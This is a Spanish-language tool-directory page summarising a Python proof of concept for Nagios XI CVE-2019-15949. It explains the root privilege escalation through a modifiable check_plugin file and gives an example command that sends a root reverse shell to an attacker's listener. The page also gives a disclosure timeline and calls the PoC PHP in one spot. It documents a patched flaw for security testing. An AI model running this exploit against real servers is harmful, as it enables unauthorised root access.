Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Nagios-CVE-2019-15949-RCE — un PoC para la RCE de Nagios CVE-2019-15949 en Python | Kitploit
Herramientas/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

un PoC para la RCE de Nagios CVE-2019-15949 en Python

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Nagios-CVE-2019-15949-RCE-Poc

un PoC en Python para el CVE-2019-15949

Resumen

Existe una vulnerabilidad en Nagios XI <= 5.6.5 que permite a un atacante aprovechar un RCE para escalar privilegios a root. El exploit requiere acceso al servidor como el usuario 'nagios', o acceso CCM a través de la interfaz web con permisos para gestionar plugins.

Detalles

El script getprofile.sh, invocado al descargar un perfil del sistema (profile.php?cmd=download), se ejecuta como root mediante una entrada sudo sin contraseña; el script ejecuta el ejecutable ‘check_plugin’, que pertenece al usuario nagios. Un usuario con sesión iniciada en Nagios XI con permisos para modificar plugins, o el usuario 'nagios' en el servidor, puede modificar el ejecutable ‘check_plugin’ e insertar comandos maliciosos ejecutables como root.

POC

Se ha desarrollado un PoC en PHP que sube un payload que resulta en una shell inversa como root. Uso:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

ejemplo:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

Divulgación

Reportado a Nagios el: 29 de julio de 2019 Confirmado por Nagios el: 29 de julio de 2019 Corregido en la versión: 5.6.6 el: 20 de agosto de 2019 CVE asignado el: 6 de septiembre de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

Descargar herramienta